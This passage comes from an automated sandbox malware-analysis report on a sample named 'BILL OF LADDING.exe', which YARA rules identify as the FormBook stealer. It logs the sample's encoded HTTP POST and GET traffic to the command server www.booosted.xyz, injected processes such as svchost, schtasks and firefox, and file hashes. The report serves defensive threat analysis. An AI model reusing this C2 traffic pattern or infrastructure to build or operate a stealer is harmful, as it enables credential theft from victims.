                                                                                        Server: openresty
                                                                                        Date: Wed, 09 Oct 2024 10:54:38 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 256
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6a 6e 51 58 3d 41 36 77 44 6b 74 58 4e 2b 71 38 4c 62 47 73 46 50 54 51 35 66 67 78 70 77 4f 48 54 4f 62 37 75 4e 38 37 74 36 4a 5a 4d 4f 2b 61 34 6f 59 5a 73 2f 51 52 39 43 54 6f 42 32 59 2f 43 74 42 4d 4f 75 47 48 50 38 53 69 38 6b 37 7a 69 41 55 71 70 4a 70 50 66 34 70 66 74 2b 37 49 77 38 30 70 7a 74 75 56 6c 4c 4f 76 6b 72 70 5a 31 6d 6f 54 2f 4d 61 61 73 53 70 63 74 62 38 2b 4c 26 6f 70 39 3d 42 4c 74 54 6d 30 56 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?jnQX=A6wDktXN+q8LbGsFPTQ5fgxpwOHTOb7uN87t6JZMO+a4oYZs/QR9CToB2Y/CtBMOuGHP8Si8k7ziAUqpJpPf4pft+7Iw80pztuVlLOvkrpZ1moT/MaasSpctb8+L&op9=BLtTm0V"}</script></head></html>
                                                                                        Oct 9, 2024 12:54:38.869766951 CEST396INHTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Wed, 09 Oct 2024 10:54:38 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 256
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6a 6e 51 58 3d 41 36 77 44 6b 74 58 4e 2b 71 38 4c 62 47 73 46 50 54 51 35 66 67 78 70 77 4f 48 54 4f 62 37 75 4e 38 37 74 36 4a 5a 4d 4f 2b 61 34 6f 59 5a 73 2f 51 52 39 43 54 6f 42 32 59 2f 43 74 42 4d 4f 75 47 48 50 38 53 69 38 6b 37 7a 69 41 55 71 70 4a 70 50 66 34 70 66 74 2b 37 49 77 38 30 70 7a 74 75 56 6c 4c 4f 76 6b 72 70 5a 31 6d 6f 54 2f 4d 61 61 73 53 70 63 74 62 38 2b 4c 26 6f 70 39 3d 42 4c 74 54 6d 30 56 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?jnQX=A6wDktXN+q8LbGsFPTQ5fgxpwOHTOb7uN87t6JZMO+a4oYZs/QR9CToB2Y/CtBMOuGHP8Si8k7ziAUqpJpPf4pft+7Iw80pztuVlLOvkrpZ1moT/MaasSpctb8+L&op9=BLtTm0V"}</script></head></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        46192.168.2.22492093.33.130.190801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:43.943067074 CEST2472OUTPOST /12c7/ HTTP/1.1
                                                                                        Host: www.booosted.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.booosted.xyz
                                                                                        Referer: http://www.booosted.xyz/12c7/
                                                                                        Content-Length: 2161
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 6d 6d 69 4c 6d 77 58 79 66 5a 58 67 61 79 65 4d 2f 6d 79 6a 4b 6d 44 76 30 4e 4f 57 41 4c 5a 50 76 77 4a 41 44 35 76 4d 39 72 51 70 57 62 6d 37 4a 6d 7a 79 6a 56 61 4c 44 49 71 33 36 70 39 4f 45 70 52 2f 61 77 6b 63 6b 61 4d 43 74 59 76 59 69 6c 4b 4c 66 46 39 36 65 55 41 33 79 46 44 6a 74 41 4c 41 4e 75 54 69 42 31 70 4f 66 63 4f 49 6e 59 4e 6a 67 67 4a 7a 49 64 78 59 68 63 4f 47 68 54 6d 6e 47 54 57 76 7a 4e 4a 31 79 30 4b 63 68 38 41 53 4d 35 74 2f 4c 6f 6c 6f 74 70 75 6f 51 35 65 63 77 35 54 59 65 2f 61 66 77 65 42 65 59 6a 6a 6c 6d 61 37 69 6a 34 59 63 46 54 32 32 32 45 48 67 45 48 58 6a 59 6e 71 4b 45 7a 4a 48 53 72 56 75 36 69 41 34 35 39 49 4c 45 51 2b 55 32 34 69 51 30 2f 4f 5a 58 39 44 67 44 75 67 72 6e 51 50 32 4d 57 71 55 4e 47 47 50 49 32 6a 6c 44 48 79 61 6c 68 5a 49 64 54 72 46 45 4c 45 71 6f 30 52 71 49 7a 61 4b 4d 30 30 7a 58 45 71 6a 36 53 2f 36 41 33 49 76 55 79 61 48 30 4a 4e 6f 39 75 6e 56 56 52 4a 68 69 64 39 77 32 2b 67 6b 44 77 70 57 37 37 46 31 69 56 6f 4f 41 [TRUNCATED]
                                                                                        Data Ascii: jnQX=mmiLmwXyfZXgayeM/myjKmDv0NOWALZPvwJAD5vM9rQpWbm7JmzyjVaLDIq36p9OEpR/awkckaMCtYvYilKLfF96eUA3yFDjtALANuTiB1pOfcOInYNjggJzIdxYhcOGhTmnGTWvzNJ1y0Kch8ASM5t/LolotpuoQ5ecw5TYe/afweBeYjjlma7ij4YcFT222EHgEHXjYnqKEzJHSrVu6iA459ILEQ+U24iQ0/OZX9DgDugrnQP2MWqUNGGPI2jlDHyalhZIdTrFELEqo0RqIzaKM00zXEqj6S/6A3IvUyaH0JNo9unVVRJhid9w2+gkDwpW77F1iVoOAADnB2j++e8U1OGSyBIElmASim7/RTuIkHZ9L2B1tG5hOeUQal0TcM8qsy+L2+B5J8AdIJeWeRrrTU56KpT/yMX1JuvKXqknX+cD5EnX9OhEjQFizJ5ReXYDZrlfplIG+HE+n9k/BWEg0Pbw3hn8vm2pr9vEozA2PmL0cx2VPZRgfix2rGbskQ3K9Wqbm0Fh4K0h6QUsJT/3SbdBpo4MOY//sY9IVIcmPrTpuvy7p95WoCfpJJdAK2Vjvzmu0/NdSTlSG24rhRl3mPKjVMGQTxTWj8IyLWunyE5PzDnYFUxdxOF40OS/jaw0Ikn1j9imgZPcnPKbS6iRUJyPKGOWG3+nVMyrBvhcnE6HE893srn50SaK751OJvwo7eNGXO+AUuPWg6P7oxFgvfYXumityzlPJfoKdqUihp6JAbe3tqr08oBlaVScI65cuufZ01+JcqnvQ4Z4PkzXzYiS57mnTtB0V6gG/1eECgF6hRfTLFW4FilLyzmqQYEL3IfM7ZT5iEvgvrsmC34vTnXF7DzUaVlCGXUPRlyVDmybQt5pCIO6XJ0czvJMyWv7TyeBJ0tpXI8xOfqhmHcWl1vsUVdn+wSU79RbpbIKGuHYi+/bqkRD0y7kB2NpeuaZzX2Go7NUjtxg5bNbnCHqEvxXxu2swbvtKGKtJDW2S/q [TRUNCATED]
                                                                                        Oct 9, 2024 12:54:43.948227882 CEST228OUTData Raw: 41 35 63 63 38 73 5a 45 78 53 66 37 68 2f 41 4b 48 54 71 6a 31 35 33 4a 38 66 76 6f 65 51 66 4e 4b 4b 74 33 56 42 55 48 6d 75 66 41 48 73 4a 74 34 74 4d 39 48 38 6d 5a 36 46 4b 56 2f 39 63 33 6f 32 33 72 58 42 61 62 36 2f 46 53 2f 43 57 70 52 62
                                                                                        Data Ascii: A5cc8sZExSf7h/AKHTqj153J8fvoeQfNKKt3VBUHmufAHsJt4tM9H8mZ6FKV/9c3o23rXBab6/FS/CWpRbVAgFFJ8/UzTI9+PUry3LHYF/MC5ZsmyWZqiI5cnFPl85SCug8CwPSHO9frsLS5yvyWf9MebPOkewTKS+UxAQTmnN7rk8gS+tswhjehN2yIfKl8mDmZvgRwoFZGJrsYZDUlNNk9dsHO0PQNxglk


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        47192.168.2.22492103.33.130.190801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:46.486243963 CEST739OUTPOST /12c7/ HTTP/1.1
                                                                                        Host: www.booosted.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.booosted.xyz
                                                                                        Referer: http://www.booosted.xyz/12c7/
                                                                                        Content-Length: 201
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 6d 6d 69 4c 6d 77 58 79 66 5a 58 67 61 31 71 4d 77 53 75 6a 4b 47 44 76 78 4e 4f 57 4b 72 5a 7a 76 77 46 49 44 35 48 63 39 64 30 70 57 4b 57 37 4a 51 76 79 67 56 61 55 49 6f 72 2f 33 4a 38 54 45 70 51 51 61 78 59 63 6b 61 49 43 73 36 6e 59 72 48 79 4b 44 6c 39 38 57 30 41 71 79 46 66 41 74 41 58 71 4e 76 37 69 42 7a 42 4f 63 63 2b 49 6a 4b 31 6a 6c 51 4a 35 4f 64 78 50 68 64 79 54 68 54 33 6f 47 53 36 76 77 34 31 31 33 32 43 63 74 4c 55 53 47 5a 74 45 46 49 6c 2b 74 35 48 79 61 50 43 70 31 5a 50 58 62 2b 37 39 31 4f 6c 67 41 56 7a 33 70 4a 37 58 74 49 31 50 4b 48 66 68 32 51 3d 3d
                                                                                        Data Ascii: jnQX=mmiLmwXyfZXga1qMwSujKGDvxNOWKrZzvwFID5Hc9d0pWKW7JQvygVaUIor/3J8TEpQQaxYckaICs6nYrHyKDl98W0AqyFfAtAXqNv7iBzBOcc+IjK1jlQJ5OdxPhdyThT3oGS6vw41132CctLUSGZtEFIl+t5HyaPCp1ZPXb+791OlgAVz3pJ7XtI1PKHfh2Q==


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        48192.168.2.22492113.33.130.190801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:49.030963898 CEST2472OUTPOST /12c7/ HTTP/1.1
                                                                                        Host: www.booosted.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.booosted.xyz
                                                                                        Referer: http://www.booosted.xyz/12c7/
                                                                                        Content-Length: 3625
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 6d 6d 69 4c 6d 77 58 79 66 5a 58 67 62 56 36 4d 38 56 61 6a 64 57 44 73 6f 39 4f 57 41 4c 5a 33 76 77 4a 49 44 35 76 4d 39 76 34 70 57 59 2b 37 4b 32 7a 79 69 56 61 55 41 49 71 33 36 70 38 38 45 6f 31 76 61 77 6f 69 6b 66 51 43 74 5a 76 59 69 6b 4b 4c 4a 31 39 36 53 30 41 31 79 46 66 56 74 41 6e 55 4e 76 4f 35 42 7a 70 4f 63 4f 47 49 6d 36 31 73 75 77 4a 35 4f 64 78 35 68 64 79 57 68 54 76 67 47 58 57 2f 7a 4c 64 31 79 6b 4b 63 6f 73 41 52 45 5a 74 36 61 34 6c 75 74 70 79 5a 51 35 65 59 77 35 32 31 65 2f 47 66 32 4e 5a 65 59 6b 50 6d 70 71 37 68 6e 34 59 63 47 6a 32 30 32 45 48 43 45 48 58 6a 59 6d 47 4b 4c 44 4a 48 53 76 4a 74 77 43 41 34 36 39 49 43 62 41 43 71 32 35 47 75 30 38 6e 6d 58 4b 37 67 43 73 59 72 67 67 50 32 45 47 71 6f 4e 47 47 53 64 6d 6a 58 44 48 36 30 6c 68 4a 59 64 54 72 46 45 49 4d 71 74 6d 4a 71 65 54 61 4b 44 55 30 2b 59 6b 71 67 36 53 37 49 41 32 4d 76 55 33 32 48 6d 50 39 6f 73 63 2f 55 64 42 4a 6b 6d 64 39 79 6e 75 68 6b 44 32 4d 78 37 36 38 51 69 55 59 4f 41 [TRUNCATED]
                                                                                        Data Ascii: jnQX=mmiLmwXyfZXgbV6M8VajdWDso9OWALZ3vwJID5vM9v4pWY+7K2zyiVaUAIq36p88Eo1vawoikfQCtZvYikKLJ196S0A1yFfVtAnUNvO5BzpOcOGIm61suwJ5Odx5hdyWhTvgGXW/zLd1ykKcosAREZt6a4lutpyZQ5eYw521e/Gf2NZeYkPmpq7hn4YcGj202EHCEHXjYmGKLDJHSvJtwCA469ICbACq25Gu08nmXK7gCsYrggP2EGqoNGGSdmjXDH60lhJYdTrFEIMqtmJqeTaKDU0+Ykqg6S7IA2MvU32HmP9osc/UdBJkmd9ynuhkD2Mx768QiUYOAGvnM3j++O8b4uGW2B0AlmIoimuKRRaIlWZ9I052jW5nJeUael1scM4IsyeL2NR5bsgdCa2ZKxrwXU48EJTryI/TJrzgUbUnWOcD5mPUlOhBqwE54p4PeXYXZp9loRMG+H0+nP8/BWEjmfbt8BqfvmKtr9zUo2M2M2b0cw2VJ5RgFyxxwWbQkUe/9XDkmlhh4rEh4SMsPz/pQbdAxI47OYv/saxYVIkmPOvpp9K7v95KhifAJJdbK2B/v3CY08pdSWJSSDUroxlqgPKnRMHmTyydj90YLUOnzkZPgnzYE0xTu+F4heTqjapPIhvPj/Cm88jcmvKYfaiQSJyMOGOEG2OnVM+rBsxcm3SHX7R3k7n/7ybVxZwpJvgO7elWXLmAV7zWn+v0tBFuqfYrkGiByzl9JdZBdfgih5aJTPKwsKrJl4B2HlTpI6oxuvrJ0CKJcvvvQKB4PUzXzYid57nuTtFOV+tp/1eECxF6mjHTBlWgaSlQ2zm4QYxq3Mzq7db5jVPgvrspNn5ddHXG7DvzaVldGXQPRziVD06bQLNpFoO6UJ0blfJNyWvVTxKRJw5pR5cxD8Cg5ncVj1v2PFA9+xu275dbosgKH7rYiO/bkkRA8S7xemB1euGzzXKWoq9Uia9g7aNYqSHnLPxVxu6lwa7lKFKHJA22Sfq [TRUNCATED]
                                                                                        Oct 9, 2024 12:54:49.036274910 CEST1692OUTData Raw: 41 39 34 63 38 76 68 45 78 69 66 36 35 66 41 4c 64 44 72 6c 67 4a 33 46 38 66 75 50 65 51 43 6f 4b 4b 5a 33 57 58 59 48 6a 73 33 41 47 63 4a 6e 7a 4e 4d 51 55 73 69 79 36 46 47 52 2f 38 73 42 6f 45 76 72 58 7a 53 62 2f 4b 78 53 36 69 57 73 65 4c
                                                                                        Data Ascii: A94c8vhExif65fALdDrlgJ3F8fuPeQCoKKZ3WXYHjs3AGcJnzNMQUsiy6FGR/8sBoEvrXzSb/KxS6iWseLVNgFBl8/laTMhYPmfytbHYB8kFvps/xWYoiI5knDWu89aSulQCwJmHPNf0lbS7zvyIf9wnbOaGez7KS/4xAwDmvt7r5sgTi9tz8TSmNyKWauN5l1ymqj5UwlRKEddkexUcK4kOV6rPmZUYwmQE3VFldr0MMnQ2oq2


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        49192.168.2.22492123.33.130.190801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:51.566931009 CEST474OUTGET /12c7/?jnQX=rkKrlAe8PM32Rlyo3XGhAGHv/PebKrU9ljR3Eqrj5cYHYbO4IgL/tGu5VYz7wugWP81CfRwkkbYRscbYiAGJC2F8RXw04VbxiTu+G9foPjo3PMuVsrJsiyJ6G7sg&op9=BLtTm0V HTTP/1.1
                                                                                        Host: www.booosted.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Oct 9, 2024 12:54:52.153110981 CEST396INHTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Wed, 09 Oct 2024 10:54:51 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 256
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6a 6e 51 58 3d 72 6b 4b 72 6c 41 65 38 50 4d 33 32 52 6c 79 6f 33 58 47 68 41 47 48 76 2f 50 65 62 4b 72 55 39 6c 6a 52 33 45 71 72 6a 35 63 59 48 59 62 4f 34 49 67 4c 2f 74 47 75 35 56 59 7a 37 77 75 67 57 50 38 31 43 66 52 77 6b 6b 62 59 52 73 63 62 59 69 41 47 4a 43 32 46 38 52 58 77 30 34 56 62 78 69 54 75 2b 47 39 66 6f 50 6a 6f 33 50 4d 75 56 73 72 4a 73 69 79 4a 36 47 37 73 67 26 6f 70 39 3d 42 4c 74 54 6d 30 56 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?jnQX=rkKrlAe8PM32Rlyo3XGhAGHv/PebKrU9ljR3Eqrj5cYHYbO4IgL/tGu5VYz7wugWP81CfRwkkbYRscbYiAGJC2F8RXw04VbxiTu+G9foPjo3PMuVsrJsiyJ6G7sg&op9=BLtTm0V"}</script></head></html>


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:06:50:49
                                                                                        Start date:09/10/2024
                                                                                        Path:C:\Users\user\Desktop\BILL OF LADDING.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\BILL OF LADDING.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:1'356'685 bytes
                                                                                        MD5 hash:570D898D83E3499D7DCE63B784B4D77E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:06:50:51
                                                                                        Start date:09/10/2024
                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\BILL OF LADDING.exe"
                                                                                        Imagebase:0x40000
                                                                                        File size:20'992 bytes
                                                                                        MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.400747547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.400747547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.400737609.0000000000220000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.400737609.0000000000220000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.400881396.0000000002B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.400881396.0000000002B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:06:51:00
                                                                                        Start date:09/10/2024
                                                                                        Path:C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe"
                                                                                        Imagebase:0xcf0000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.885170853.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.885170853.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:06:51:02
                                                                                        Start date:09/10/2024
                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\schtasks.exe"
                                                                                        Imagebase:0xc40000
                                                                                        File size:179'712 bytes
                                                                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.884925142.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.884925142.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.884947109.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.884947109.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.884979231.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.884979231.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:06:51:14
                                                                                        Start date:09/10/2024
                                                                                        Path:C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe"
                                                                                        Imagebase:0xcf0000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.885097332.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.885097332.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:06:51:29
                                                                                        Start date:09/10/2024
                                                                                        Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                                        Imagebase:0x1260000
                                                                                        File size:517'064 bytes
                                                                                        MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.457282597.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.457282597.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        No disassembly